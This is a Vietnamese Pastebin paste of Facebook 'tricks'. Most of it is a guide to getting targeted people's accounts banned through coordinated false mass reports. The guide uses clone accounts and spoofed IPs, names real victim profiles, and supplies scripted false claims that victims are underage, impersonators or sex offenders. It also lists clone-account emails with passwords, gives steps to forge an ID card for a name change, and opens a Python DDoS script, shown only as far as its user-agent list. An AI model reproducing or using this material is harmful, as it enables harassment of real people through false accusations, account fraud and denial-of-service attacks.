SHARE
TWEET

Trick by Huy Bảo

a guest Dec 12th, 2015 620 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. Dam dùm anh thằng này nhé
 2. ~~ https://www.facebook.com/lam.phangia.7
 3. ~~ Name : Lâm Phan Gia
 4.  
 5. https://www.facebook.com/ong.hoang.9028?hc_location=ufi          Hu Cau
 6. https://www.facebook.com/kangmin.kyung.58173?fref=ufi&pnref=story        Lê Mỹ Bo    id 100007419610271
 7.  
 8. dùng 2 clone ( 3 clone cũng đc )
 9. - 2 acc đều fake avata vs cover  1 acc chỉnh thời gian về năm 2k10, 1 acc chỉnh về thời gian nó cài avata vs cover
 10. - 1 acc fake biệt danh của mình là tên của nó, 1 acc fake biệt danh của mình là biệt danh của nó ( k có biệt danh thì fake tên)
 11. -  acc 1  fake ip South Korea ngôn ngữ Hàn quốc ( 한국어 , góc cuối dưới dòng မြန်မာဘာသာ 1 tí )
 12.  vào link : https://www.facebook.com/help/contact/1408156889442791 copy vào 3 tab
 13. - 1 Tab 9t , 1 tab 11t , 1 tab 14t , điền thần chú sau :
 14. 이 계정은 페이스 북 계정에 가입 할 나이가되지 않습니다 .- 주인은 출생 연도 잘못 페이스 북 계정을 등록합니다 .- 스팸의 목적을 위해 여러 계정을 유지된다는 .- 내가 걱정 계정을 나타 내기 때문에이 애완 동물 건강에 해로운 의도. 팀이 검토하고 페이스 북 계정을 삭제 기대
 15. - rồi cũng acc đấy vào link https://www.facebook.com/help/contact/209046679279097 :
 16. 11t nhé rồi điền :
 17.    -This account apparently impersonating me bad purpose , please lock the account , thanking the team facebook .
 18. - Nếu rãnh thì qua tây ban nha cũng dùng như thế
 19.  
 20.  
 21. rồi 2 acc đều chuyển qua ip us ngôn ngữ us hết nhé, nhớ 2 acc đều fake avata vs cover nhé và 2 acc add FR với nhau nhé
 22. - acc 1 báo cáo victim người này đang mạo danh tôi rồi điền tên acc 2 vào
 23. - acc 2 vào victim báo cáo mạo danh tôi , f5 rồi báo đóng tài khoản , chơi trò chơi , rồi báo mạo danh một người tôi pít tên acc 1
 24. -  acc 1 báo cáo mạo danh tôi- đóng tài khoản - doanh nghiệp rồi vào link
 25. -https://www.facebook.com/help/contact/209046679279097  đều 9t 2 tab
 26.  
 27. This account is not old enough to join Facebook account .- owner has to register birth year wrong Facebook account .- Being maintain multiple accounts for the purpose of spamming .- I am worried because the account represents a pet unhealthy intentions. Expect teams to review and delete Facebook account
 28.  
 29. This account is used for the purpose fake name fake me or someone I know , Facebook team should close this account .
 30. The account holder is a child less than 13 years old to use the user account name Facebook.- Account gia.- impersonating me or someone I know , Facebook team would like to close this account to the standards community has fabricate.
 31.  
 32. - Rồi báo cáo cái ô cuối ấy nó sẽ hiện ra trang dạng khác , điền tên , 11t hết nhé , thần chú :
 33.  
 34. - This is the account The account holder danh.- appearance not old enough to join Facebook . - Account to be used for spam - ​​users maintain multiple accounts to use for spam - ​​this account is not sufficient to use controls Facebook !
 35.  
 36. - I think this child is under 13 and not old enough to join Facebook . - This account is impersonating . - Accounts created with the purpose of pornography , hate speech . Expect Facebook Team delete that account as the terms Facebook poses . Thank team Facebook .
 37.  
 38. -- Vào 1 acc báo cáo nội dung không phù hợp - gợi dục - đóng tài khoản
 39. -- Acc 2 báo cáo avata sex hoặc spam - nội dung khác  - đóng tài khoản
 40. -- rồi tìm mấy cái tus mới đăng mà báo cáo sex hoặc bị hack
 41. -- còn mấy cái Cmt báo cáo ngôn ngữ thù địch
 42. - rồi vào link : https://www.facebook.com/help/contact/456046581124903 - ô đầu nhé
 43. ô 1 : điền Link avata
 44. rồi 2 ô còn lại điền tên của mình đang báo cáo
 45. Ví dụ : Tên mình là Nhân Siêu Guy , thì ô 2 : Nhân Siêu , ô 3 : Guy
 46. - rồi vào link : https://www.facebook.com/help/contact/143363852478561 chọn ô 2 - ô 2 - ô 1
 47. ô đầu : điền link ảnh trong album hoặc link cover của nó nhé
 48. rồi điền 2 ô còn lại
 49. - Nếu acc nó có video thì báo cáo link này : https://www.facebook.com/help/contact/238143722982783 , nó có video đại diện càng tốt :V
 50.  
 51. vẫn giữ ip mỹ , hoặc cái này uk càng tốt
 52. - vào spam vài cái sex nữa - với đóng tài khoản
 53. - vào link : https://www.facebook.com/help/contact/207005222725325 điền theo các ô
 54. chọn Có - Liên kết đến một bài báo trực tuyến điền : http://vietbao.vn/An-ninh-Phap-luat/Keo-be-gai-xuong-ho-ca-phe-de-hiep-dam/2147604926/218/
 55. - ô bổ sung :  - Account holders are maintaining multiple accounts for the purpose of pornography, sexual abuse .- Spam spread of inappropriate content. Team Facebook should delete this account!
 56.  
 57. - còn lượt gởi link 13t thì gởi nhìu vào ^_^ , cứ vài thần chú đấy mà triển , 9t
 58.  
 59. It was a youth of 13 use Facebook . - This is the impersonation account . - Account to be used for spam - ​​users maintain multiple accounts to use for spam - ​​this account is not sufficient to use controls Facebook !
 60.  
 61. - This is the account The account holder danh.- appearance not old enough to join Facebook . - Account to be used for spam - ​​users maintain multiple accounts to use for spam - ​​this account is not sufficient to use controls Facebook !
 62.  
 63. I think that this time line is to use fake names for the purpose of forgery , spamming on Facebook , posting inappropriate content should not have , and Facebook groups should consider closing the account .
 64.  
 65. - có thể fake ip khác nhanh hơn như thái lan , info đặt biệt là Thái Lan
 66. - làm us thì tối và hóng f5 có thể vài phút đi ^_^
 67.  
 68.  
 69. --------------------------------------------------UNLOCK-----------------------------------------------
 70.  
 71.  
 72. Unl 13t
 73.  
 74. - Hello facebook team .
 75. My account was disabled for error .
 76. - I hope the team facebook reconsider and reopen my account to join the facebook community .
 77. - I hereby confirm that I have over 13 years of age and have a valid identification by the government.
 78. I fully use their real identity when joining facebook .
 79. - The information on my facebook account is factual information about my valuation .
 80. include :
 81. - Full name:
 82. - Birthday :
 83. - Home address:
 84. rated facebook group wants to help me .
 85. thank the team facebook ..
 86.  
 87.  
 88.  
 89. ------------------------------------------------PART-------------------------------------------
 90.  
 91.  
 92. FAQ Khủng> có thể ra MD CÓ THỂ RA FAQ THẬP CẨM
 93. đầu tiên cầm 5 đến 6 clone để avatar victim! rồi mỗi clone fake các ip sau
 94. US, UK, Hàn, Thái, Đức ! mỗi clone fake các ip đó báo md tôi + khác + đóng tài khoản
 95. sau đó fake US vào link này: https://www.facebook.com/help/contact/564493676910603 ( điền những thông tin cần) sau đó 2p sau nó gửi về mail về fake US rep lại là
 96. URL: (victim)
 97. full name:
 98. date of birth:
 99. Hi, It's a fake, an offender goes against the law and standards, please consider and closed safely
 100. sau đó ra qua UK vào link sau: https://www.facebook.com/help/contact/207005222725325 (It is a personal page disgusting lack of culture, maintain the pornography, there are irresponsible actions hurt others)
 101. sau đó cầm 5 clone đó fang 13 14t
 102. https://www.facebook.com/help/contact/209046679279097 (9 nam)
 103. https://www.facebook.com/help/contact/1408156889442791 (10 nam)
 104. Hi, there is a Facebook group committed errors when to account security pass to get active, users are too young to community towards Facebook, please close all the people to the community is no longer threats like phishing    (13t)
 105.  
 106. This is a violation of the child, which is a child of 14 years or less is trying to overcome something to get to the community, will be a danger to those around them   (14t)
 107.  
 108. Xong vào link: ( vẫn giữ IP US nhé ):
 109. https://www.facebook.com/help/contact/207005222725325
 110. Dòng 1 điền email
 111. Dòng 2 điền tên victimn
 112. Dòng 3 link victim
 113. Dòng 4: Viet Nam
 114. chọn Yes
 115. Link to a news article
 116. điền link này vào:
 117. http://laodong.com.vn/phap-luat/ky-an-pham-toi-hiep-dam-den-kho-tin-343001.bld
 118. Xong phần thông tin bổ sung điền:
 119. Here is an account that I knew had sexually abused. facebook group requests please remove this account.FAQ sex dồn dame chất 2015 by Phạm Đình Thắng Biểu tượng cảm xúc heart
 120.  
 121. Clone 1: mrtx2spro@gmail.com   016756460561594
 122. Clone 2: vinhtuyhoa@yahoo.com  016756460561591
 123. Clone 3: 100010683666114    chiyeuminhem
 124. Clone 4:  chauvinhth@gmail.com  08196800
 125. Clone 5: tk: huy02d@yahoo.com.vn    nguthidungnoi
 126. Clone 6: clonehuybao@gmail.com    zxc1452366996
 127.  
 128. -----------------------------------------------PART--------------------------------------------
 129. https://www.facebook.com/binanhnguyen?fref=hovercard      Tên victim: Jacky Hanny
 130. B1 : báo cáo mạo danh tôi
 131. B2 : Báo cáo tài khoản giả mạo gamer
 132. B3 : Báo cáo đóng tài khoản
 133. B4 : Sẽ hiện ra bảng chọn thái độ.Điền ''This is my old account , please delete it . Thank team Facebook''
 134. B5 Báo cáo nội dung ko phù hợp -> dòng thứ 3 ấy
 135.  
 136.  
 137. Tut report Tên Giả Chuẩn .
 138. - Lưu ý là dù tên nó có là tên thật vẫn phải up lại cmnd -
 139. - Fake Ngôn ngữ english ( Uk updown )
 140. - IP Việt Nam :
 141. * 1 : Vào trang cá nhân : -> báo cáo tài khoản này -> đang sử dụng tên giả -> gửi tin nhắn ..because policies required to correct name real name , so I ask your name facebook reverify
 142. * 2 : Vào link : https://www.facebook.com/help/contact/1408156889442791
 143. - Chọn 12 năm và điền y hệt câu vừa gửi tin nhắn cho nó !
 144. - Sang wall -> Yêu cầu đóng tài khoản ! ! !
 145. - Hóng !
 146.  
 147. ~ Ngon heart emoticon làm biếng làm video
 148. fake ip us vs ngôn ngữ us nên 2 clone nhé
 149. acc 1 nên fake avata vs cover và để thời gian = năm 2011
 150. ~ Vào link https://www.facebook.com/help/contact/209046679279097
 151. chọn 9 năm : thần chú : I expect facebook or review , delete this account immediately for violating facebook about what was agreed , this account is impersonating me and my friends , deliberately misleading name to join facebook and harassment puppet, invasion of privacy , this kid has declared false than his real age to register facebook . This seriously violates the terms Facebook . Expect this facebook account soon deleted .
 152. rồi cũng acc đó vào báo cáo mạo danh tôi , rồi vào link đó nữa chọn 9 năm điền thần chú :
 153. This account is using fake names with intent to impersonate me or someone I know , welcome to the locked facebook account .
 154. ~ acc 2 vào link https://www.facebook.com/help/contact/209046679279097
 155. chọn 9 năm : thần chú : This account is using fake names with intent t is a young person under 13 use Facebook . - This is the impersonation account. - Account to be used for spam - Users maintain multiple accounts to use on spam - This account is not enough controls to Facebook o impersonate me or someone I know.
 156. vào link đó luôn : 9t thần chú : This account is using fake names with intent to impersonate me or someone I know , welcome to the locked facebook account .
 157. ~ sau đó lấy acc 1 báo cáo mạo danh tôi , báo cánh ảnh spam - bị hack , đóng tài khoản , mạo danh trò chơi ,nội dung khỏa thân
 158. ~ acc 2 báo cáo ảnh khỏa thân ( avata ) , rồi vào báo cáo gợi dục , 1 vé doanh nghiệp
 159. ~ lấy clone 2 cho tỉ lệ cao báo ảnh avata ( acc này k fake ) báo cáo ảnh này vi phạm văn hóa việt nam , và báo cáo kích động thù địch ( trong nội dung không phù hợp - Tôi nghĩ ảnh này không nên xuất hiện trên Facebook - Quấy rối hoặc ngôn từ kích động thù địch,mua bán súng
 160. cần 2 clone đều fake ip us hết
 161. clone 1 thay avata vs cover và chỉnh về năm 2k9
 162. lấy acc 2 báo cáo một người nổi tiếng
 163. acc 1 vào báo cáo mạo danh tôi , mạo danh chơi trò chơi , đóng tài khoản này
 164. acc 2 báo cáo doanh nghiệp , đóng tài khoản này
 165. acc 2 báo cáo ảnh này Ảnh này không phù hợp, làm phiền hoặc không thú vị , đóng tài khoản này
 166. acc 1 báo cáo mạo ảnh nào khỏa thân và khiêu dâm , và báo cáo khỏa thân gợi dục , đóng tài khoản này
 167. acc 1 báo cáo tài khoản bị hack
 168. acc 2 cũng báo tài khoản bị hack , rồi báo cáo mạo danh tôi
 169. muốn tỉ lệ cao thì gởi vài vé 13 14t nữa , https://www.facebook.com/help/contact/209046679279097 9 năm
 170. -
 171.  
 172. - Report 13t Biểu tượng cảm xúc heart :))
 173. - Fake IP Thái Lan , Ngôn ngữ không quan trọng!
 174. - https://www.facebook.com/help/contact/209046679279097
 175. - B1: Nhập link fb nạn nhân cần ra đảo!
 176. - B2: Nhập tên fb nạn nhân cần ra đảo! Biểu tượng cảm xúc smile
 177. - B3:Chọn 9 năm
 178. - B4:Thần chú:- มันเป็นเด็กอายุต่ำกว่า 13 ปีของชุมชน Facebook
 179. - บัญชีของเด็กนี้ไม่ได้ประกาศอายุที่ถูกต้องของเขาเมื่อการใช้งานและจุดประสงค์ที่จะเอาชนะการเปิดตัว Facebook
 180. - การทุจริตบัญชีปลอมตัวเป็นความใกล้ชิดของฉัน
 181. - เด็กที่อยู่ในขอบเขตของการจัดตั้ง Facebook
 182. - ตรวจสอบและปิดการใช้งานบัญชี ขอบคุณ Facebook กลุ่ม
 183. - Rồi Fake IP Hoa Kỳ , vào trang cá nhân của nạn nhân , báo cáo đây là tài khoản giả mạo , người này đang mạo danh tôi , nội dung không phù hợp , đóng tài khoản
 184.  
 185.  
 186. Fake ip anh
 187. 9 năm
 188. Hello Facebook-Team
 189. Der Inhaber dieses Konto 1 Kind bis 13 Jahre
 190. Es ist nicht Recht, an der Facebook nehmen
 191. Der Gesetzentwurf wurde entwickelt, um die Satzung der Facebook überwinden
 192. Es ist für das Kind und der Facebook-Community gefährlich
 193. Ich fragte Facebook-Team sofort schließen sche
 194. Dank Facebook-Team
 195.  
 196. Tiếp ip anh
 197. 9 năm
 198. Привіт Facebook гравця
 199. Власник цього рахунку 1с дитина віком до 13 років
 200. Це не право на участь в Facebook
 201. Рахунок був створений, щоб подолати статут Facebook
 202. Це небезпечно для дитини і Facebook спільноти
 203. Я запитав Facebook Команда негайно закрити цей рахунок
 204. Спасибі Facebook Team
 205.  
 206. Fake us hoặc Brazil
 207. This timeline is impersonating me and my friends. It harass people on Facebook. I think this is a time line of baby, parents are not allowed. Please let Facebook account deactivated for Facebook is increasingly safer. Thank you
 208. Dưới 9 năm
 209. Ngôn ngữ ~>English
 210.  
 211.  
 212.  
 213.  
 214. -------------------------------------------------------------------THỦ THUẬT FB---------------------------------------
 215. Code dấu tích:
 216. <span data-hover="tooltip" data-tooltip-position="right" class="_56_f _5dzy _5d-1 _5d-3" id="u_jsonp_6_5" aria-label="Verified profile"></span>
 217.  
 218. Read more: http://forum.vietdesigner.net/threads/huong-dan-verify-tai-khoan-facebook-cuc-de-tu-suong-la-chinh.64278/#ixzz3qoWE3WeP
 219.  
 220. ----------------Ngày sinh quá giới hạn----------------------
 221. Ngôn ngữ US
 222. https://www.facebook.com/help/contact/177493942357554
 223. ->This is my real birthday
 224. HÓNG
 225.  
 226.  
 227. ----------------------------------ĐỔI TÊN TRƯỚC 60 NGÀY --------------------------------
 228. B1 Go to http://www.sanwebe.com/assets/generate-facebook-id-card/ tạo một id card facebook rồi lưu nó lại nhé Biểu tượng cảm xúc colonthree
 229. B2 : go to https://chrome.google.com/…/gkojfkhlekighikafcpjkiklfbnlmei… để cài đặt hola better ( Để là new theland nhé)
 230. B3 : Go to https://facebook.com/help/contact/245617802141709?refid=69 để đổi tên thôi ( chỗ lý do thay đổi thì để là khác nhé )
 231. Chờ fb nó rep lại thì Điền vào mẫu dưới nhé
 232. -Hi Facebook Team
 233. -My New Name It Isn’t Set On My Account
 234. -My New Name Is: Bảo Châu
 235. -And this is my ID Card
 236. -Thanks Facebook Team
 237. -------Lưu Ý Ở bước 3 nhớ tải cái id card facebook nhé Biểu tượng cảm xúc pacman
 238.  
 239.  
 240. Code ddos bằng koding,tạo file có đuôi .py
 241. Lệnh: python tên file.py victim
 242. Code:
 243.  
 244. #!/usr/bin/env python
 245. #coding: utf8
 246. #Edit and Update by :keith
 247. #May 10th 2015
 248.  
 249. import random
 250. import socket
 251. import time
 252. import threading
 253. userAgents = [
 254.         "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1"
 255.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)"
 256.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
 257.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)"
 258.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)"
 259.         "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
 260.         "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3"
 261.         "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)"
 262.         "Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
 263.         "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)"
 264.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E"
 265.         "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1"
 266.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)"
 267.         "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15"
 268.         "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57"
 269.         "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413"
 270.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
 271.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)"
 272.         "Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0"
 273.         "Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)"
 274.         "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125"
 275.         "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)"
 276.         "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413"
 277.         "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)"
 278.         "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
 279.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)"
 280.         "Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)"
 281.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)"
 282.         "Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10"
 283.         "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4"
 284.         "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0"
 285.         "Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10"
 286.         "Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)"
 287.         "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
 288.         "Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
 289.         "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
 290.         "Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16"
 291.         "Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1"
 292.         "Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)"
 293.         "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
 294.         "Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)"
 295.         "Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)"
 296.         "Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7"
 297.         "BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0"
 298.         "Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)"
 299.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
 300.         "Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)"
 301.         "Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)"
 302.         "Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10"
 303.         "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
 304.         "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
 305.         "BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179"
 306.         "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
 307.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
 308.         "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)"
 309.         "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)"
 310.         "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0"
 311.         "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
 312.         "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
 313.         "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13"
 314.         "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)"
 315.         "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
 316.         "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
 317.         "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)"
 318.         "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)"
 319.         "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8"
 320.         "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7"
 321.         "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
 322.         "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
 323.         "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
 324.         "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3"
 325.         "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
 326.         "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
 327.         "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1"
 328.         "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1"
 329.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)"
 330.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
 331.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)"
 332.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)"
 333.         "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
 334.         "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)"
 335.         "AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)"
 336.         "Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)"
 337.         "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
 338.         "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
 339.         "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
 340.         "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
 341.         "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
 342.         "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3"
 343.         "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)"
 344.         "Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
 345.         "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)"
 346.         "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E"
 347.         "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1"
 348.         "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)"
 349.         "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15"
 350.         "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57"
